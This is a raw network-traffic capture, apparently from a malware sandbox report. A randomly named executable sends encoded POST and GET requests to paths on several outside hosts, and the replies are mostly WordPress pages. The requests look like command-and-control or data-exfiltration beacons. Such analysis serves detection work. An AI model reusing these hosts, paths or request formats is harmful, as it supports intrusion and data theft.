                                                          Data Ascii: in.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.
                                                          Jan 11, 2025 01:40:11.995915890 CET1236INData Raw: 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20
                                                          Data Ascii: illReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="w
                                                          Jan 11, 2025 01:40:11.995928049 CET500INData Raw: 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46
                                                          Data Ascii: ports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).t
                                                          Jan 11, 2025 01:40:11.995954037 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                          Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                          Jan 11, 2025 01:40:11.996020079 CET1236INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                          Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                          Jan 11, 2025 01:40:11.996033907 CET448INData Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                          Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                          Jan 11, 2025 01:40:11.996048927 CET1236INData Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30
                                                          Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
                                                          Jan 11, 2025 01:40:12.001015902 CET1236INData Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61
                                                          Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549972134.0.14.158803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:13.679163933 CET1672OUTPOST /6xrr/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.aballanet.cat
                                                          Origin: http://www.aballanet.cat
                                                          Referer: http://www.aballanet.cat/6xrr/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 57 37 48 44 7a 49 4b 2f 52 78 35 5a 79 33 4c 79 75 7a 66 35 6a 6b 75 4d 55 76 71 32 59 2b 43 6e 6a 6d 6d 50 75 70 67 33 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 76 4d 4b 33 36 53 4a 65 34 53 51 68 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 78 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJW7HDzIK/Rx5Zy3Lyuzf5jkuMUvq2Y+CnjmmPupg3iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIvMK36SJe4SQhRE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHo4CPWl4goDYbh4HPcvNOiuDBXt1FtRK/ligONTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHAqpk1uJYZVsyRSuxwIUACK4C4mRg5yxFISplP3LXFb1K0hpk3DoYLGxDdGhBse5ukTqEAMgr4kZvdbnTVDfXSN27zvaDQTLCUev227Y/+NpDAlQSlzPXlzKqJvsXkhzKp36nuiM+gBAD22tpOdrgdyROqwD6HXzYvwjsKODrpROu/YOGh68dTCGWx/dSqlYMCI4VUd5iHbrDrUfgiI8S9tZGTAScwIl6CP8+MasiNL93H7TvkLfg1VKZhVWWSV+lP6/1TiZv0uosQJ7y4wMEU24xDthdgfhCZVIX6+a9rmEJjnUWC5B13sZyaFm9nfhvPDRIjT6HgjOb4nS3qgtHBfbLAWyrtpVf9hZaRs5kggJ64KF8w3R5s2fFBClszODNeKNA1Zbn8kD/HdPeVevR9ki+LLOjKdr29tXxEzSOFh8ngbpkbNOKYcf0VWvoYt6e+s5K2XKZLqoJ74yg0K/xBjqGtYMiKptW6BBaLbUCHHlCvFqw4DQxuJNiBHaM7lkcPu0cRZ/FVfSn6mf [TRUNCATED]
                                                          Jan 11, 2025 01:40:14.509183884 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 00:40:14 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                          Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                          Jan 11, 2025 01:40:14.509200096 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                          Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                          Jan 11, 2025 01:40:14.509213924 CET448INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                          Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                          Jan 11, 2025 01:40:14.509234905 CET1236INData Raw: 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33
                                                          Data Ascii: {e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageDa
                                                          Jan 11, 2025 01:40:14.509257078 CET1236INData Raw: 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69
                                                          Data Ascii: peof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
                                                          Jan 11, 2025 01:40:14.509273052 CET276INData Raw: 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72
                                                          Data Ascii: {n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemoji
                                                          Jan 11, 2025 01:40:14.509287119 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                          Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                          Jan 11, 2025 01:40:14.509300947 CET1236INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                          Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                          Jan 11, 2025 01:40:14.509315014 CET448INData Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                          Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                          Jan 11, 2025 01:40:14.509330034 CET1236INData Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30
                                                          Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
                                                          Jan 11, 2025 01:40:14.514245033 CET1236INData Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61
                                                          Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549980134.0.14.158803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:16.224611044 CET378OUTGET /6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.aballanet.cat
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:40:17.051168919 CET506INHTTP/1.1 301 Moved Permanently
                                                          Date: Sat, 11 Jan 2025 00:40:16 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Location: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm
                                                          Content-Length: 0
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549981103.224.182.242803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:22.543145895 CET626OUTPOST /0mwe/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.madhf.tech
                                                          Origin: http://www.madhf.tech
                                                          Referer: http://www.madhf.tech/0mwe/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 30 41 6b 72 73 34 42 48 6c 47 43 79 58 72 50 52 78 47 46 58 67 39 55 4b 33 58 36 55 63 65 4f 6a 51 6b 59 6a 6f 73 3d
                                                          Data Ascii: KBEhCJ=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2U0Akrs4BHlGCyXrPRxGFXg9UK3X6UceOjQkYjos=
                                                          Jan 11, 2025 01:40:23.160283089 CET871INHTTP/1.1 200 OK
                                                          date: Sat, 11 Jan 2025 00:40:23 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1736556023.3953434; expires=Tue, 09-Jan-2035 00:40:23 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                          Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549982103.224.182.242803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:25.088967085 CET646OUTPOST /0mwe/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.madhf.tech
                                                          Origin: http://www.madhf.tech
                                                          Referer: http://www.madhf.tech/0mwe/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 52 73 61 6b 66 4e 46 73 2f 6e 35 7a 30 6f 39 2f 37 4e 44 74 58 4b 34 49 76 4b 39 35 72 49 42 69 67 32 30 59 6c 4e
                                                          Data Ascii: KBEhCJ=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEARsakfNFs/n5z0o9/7NDtXK4IvK95rIBig20YlN
                                                          Jan 11, 2025 01:40:25.706581116 CET871INHTTP/1.1 200 OK
                                                          date: Sat, 11 Jan 2025 00:40:25 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1736556025.8120462; expires=Tue, 09-Jan-2035 00:40:25 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
